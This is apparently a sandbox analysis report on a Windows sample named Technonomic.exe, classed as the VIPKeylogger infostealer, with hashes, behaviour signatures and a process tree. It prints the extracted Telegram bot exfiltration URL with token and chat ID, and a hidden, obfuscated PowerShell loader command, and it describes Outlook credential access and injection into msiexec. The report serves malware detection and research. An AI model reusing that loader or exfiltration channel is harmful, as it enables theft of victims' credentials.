Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
Technonomic.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Technonomic.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
Technonomic.exe
-
Size
759KB
-
MD5
c174a412be6f74c3323ae8d6d4737086
-
SHA1
c703daa5df8c281206a8d85b582b8a1b729748f5
-
SHA256
bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
-
SHA512
9f2b95174fd1283964ea61e6dbe07c450ed0a01aad6b3852c43ef6811a92878f0f123dfbc1f88b2cf05479a94af098591bd579f3c3581521819f3b12d20dfa42
-
SSDEEP
12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendMessage?chat_id=6070006284
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1348 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 4276 Technonomic.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 21 4988 msiexec.exe 23 4988 msiexec.exe 25 4988 msiexec.exe 27 4988 msiexec.exe 31 4988 msiexec.exe 34 4988 msiexec.exe 36 4988 msiexec.exe 41 4988 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 drive.google.com 21 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 33 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4988 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1348 powershell.exe 4988 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\unthick.ini Technonomic.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Technonomic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 1348 powershell.exe 4988 msiexec.exe 4988 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1348 powershell.exe Token: SeIncreaseQuotaPrivilege 1348 powershell.exe Token: SeSecurityPrivilege 1348 powershell.exe Token: SeTakeOwnershipPrivilege 1348 powershell.exe Token: SeLoadDriverPrivilege 1348 powershell.exe Token: SeSystemProfilePrivilege 1348 powershell.exe Token: SeSystemtimePrivilege 1348 powershell.exe Token: SeProfSingleProcessPrivilege 1348 powershell.exe Token: SeIncBasePriorityPrivilege 1348 powershell.exe Token: SeCreatePagefilePrivilege 1348 powershell.exe Token: SeBackupPrivilege 1348 powershell.exe Token: SeRestorePrivilege 1348 powershell.exe Token: SeShutdownPrivilege 1348 powershell.exe Token: SeDebugPrivilege 1348 powershell.exe Token: SeSystemEnvironmentPrivilege 1348 powershell.exe Token: SeRemoteShutdownPrivilege 1348 powershell.exe Token: SeUndockPrivilege 1348 powershell.exe Token: SeManageVolumePrivilege 1348 powershell.exe Token: 33 1348 powershell.exe Token: 34 1348 powershell.exe Token: 35 1348 powershell.exe Token: 36 1348 powershell.exe Token: SeDebugPrivilege 4988 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4276 wrote to memory of 1348 4276 Technonomic.exe 82 PID 4276 wrote to memory of 1348 4276 Technonomic.exe 82 PID 4276 wrote to memory of 1348 4276 Technonomic.exe 82 PID 1348 wrote to memory of 4988 1348 powershell.exe 91 PID 1348 wrote to memory of 4988 1348 powershell.exe 91 PID 1348 wrote to memory of 4988 1348 powershell.exe 91 PID 1348 wrote to memory of 4988 1348 powershell.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Technonomic.exe"C:\Users\Admin\AppData\Local\Temp\Technonomic.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\Admin\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4988
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD51b0e41f60564cccccd71347d01a7c397
SHA1b1bddd97765e9c249ba239e9c95ab32368098e02
SHA25613ebc725f3f236e1914fe5288ad6413798ad99bef38bfe9c8c898181238e8a10
SHA512b6d7925cdff358992b2682cf1485227204ce3868c981c47778dd6da32057a595caa933d8242c8d7090b0c54110d45fa8f935a1b4eec1e318d89cc0e44b115785
-
Filesize
68KB
MD5976eb0849970c5cb55573f0e7353c3ea
SHA14de6ac2dbc2c6426577a0d0a00e5cdc67a063f83
SHA256e9bee48a708248f9ca1407265d0f8ff57d6fb50b77875a4a540cb653762f882b
SHA5121fae421a9f2f06f0b96b5f6e6127e656406ed31a89e93fd0d21d130e46f1317b6771336e3d46f2596c3010a98134a6b842d807333fe31e41de25ffad47bfd593
-
Filesize
313KB
MD5a9dc6d94fdb2c6592b4832c3f06ca195
SHA189d856bd799a41348f5dbe6667a8223561ca1572
SHA256523e1b41aa618625328eab0ed0de332ec4078dded26ee1753180f4e45db84c38
SHA512f84d597a69e1d8130cbb97f2343983abc1525f1f33b9021c90d7e6b9952d61fe697050b32b7eb4ec13bab11df3211da4da9e20b4f3b4e0d38227a61afa0e5a01
-
Filesize
33B
MD5e23f52386361095bdb7040b09e2216ae
SHA191f31dd82ab80140db621b6dce0b9b5d6b568723
SHA25636467321184a76e0fea592d2896856a37ec18fc8480de66f05d719d93b39d070
SHA51219d18de54b3466f0d283271786b3b308c3be07f21174c46563c4c16292716c52f2c1b85f416ed77143ea6847bfc4c4c37f22296948eac47499276b181f129b9c